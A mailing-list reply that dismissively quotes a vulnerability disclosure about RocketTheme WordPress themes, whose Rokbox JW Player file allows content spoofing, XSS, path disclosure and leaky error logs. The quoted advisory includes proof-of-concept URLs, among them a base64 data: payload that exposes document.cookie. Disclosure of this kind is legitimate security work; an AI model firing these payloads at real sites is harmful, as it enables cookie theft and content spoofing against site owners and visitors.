Full path disclosure, vulnerability? Ahahahahaha, good joke! You made my day.
2012/12/29 MustLive <mustl...@websecurity.com.ua> > Hello list! > > Earlier I've wrote to the list about multiple vulnerabilities in multiple > themes for WordPress (http://seclists.org/fulldisclosure/2012/Dec/236). In > that later I've mentioned 16 themes by RocketTheme (with Rokbox): > Afterburner, Refraction, Solarsentinel, Mixxmag, Iridium, Infuse, > Perihelion, Replicant2, Affinity, Nexus, Sentinel, Mynxx Vestnikp, Mynxx, > Moxy, Terrantribune, Meridian. > > I've wrote about 14 themes + 2 variations of 2 themes by these developers, > but they have 47 themes for WordPress in total. Among them only three are > free, and all other themes from RocketTheme are paid ones (it's needed to > buy subscription to the club to receive access to them). And Rokbox is > bundled with all these themes, except Grunge, which have all > earlier-mentioned vulnerabilities. > > So I inform you about multiple vulnerabilities in 33 new themes for > WordPress, which are developed by RocketTheme (Rokbox's developers). These > are Content Spoofing, Cross-Site Scripting, Full path disclosure and > Information Leakage vulnerabilities. > > ------------------------- > Affected products: > ------------------------- > > In these 32 themes (in addition to previous 16) there are Cross-Site > Scripting, Content Spoofing, Full path disclosure and Information Leakage > vulnerabilities. And Grunge theme has FPD holes. > > These are the next themes by RocketTheme: Voxel, Diametric, Ionosphere, > Clarion, Halcyon, Visage, Enigma, Momentum, Radiance, Camber, Reflex, > Modulus, Nebulae, Entropy, Tachyon, Mercado, Maelstrom, Syndicate, Paradox, > Hybrid, Omnicron, Zephyr, Panacea, Somaxiom, Juxta, Quantive, Crystalline, > Kinetic, Dominion, Reaction, Akiraka, Novus and Grunge. > > Affected all versions of these themes for WordPress. > > Since August I've informed the developers many times concerning > vulnerabilities in Rokbox and their themes with it. > > ---------- > Details: > ---------- > > Content Spoofing (WASC-12): > > In parameter file there can be set as video, as audio files. > > Swf-file of JW Player accepts arbitrary addresses in parameters file and > image, which allows to spoof content of flash - i.e. by setting addresses > of > video (audio) and/or image files from other site. > > > http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF > > http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg > > Content Spoofing (WASC-12): > > Swf-file of JW Player accepts arbitrary addresses in parameter config, > which > allows to spoof content of flash - i.e. by setting address of config file > from other site (parameters file and image in xml-file accept arbitrary > addresses). For loading of config file from other site it needs to have > crossdomain.xml. > > > http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml > > 1.xml > > <config> > <file>1.flv</file> > <image>1.jpg</image> > </config> > > Content Spoofing (WASC-12): > > > http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site > > XSS (WASC-08): > > > http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B > > Full path disclosure (WASC-13): > > In all these themes there is FPD in index.php > (http://site/wordpress/wp-content/themes/rt_novus_wp/ and the same for > other > themes), which works at default PHP settings. Also potentially there are > FPD > in other php-files of these themes. > > Information Leakage (WASC-13): > > In some themes, similar to rt_mixxmag_wp, there can be error log with full > paths. > > http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log > > Best wishes & regards, > MustLive > Administrator of Websecurity web site > http://websecurity.com.ua > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/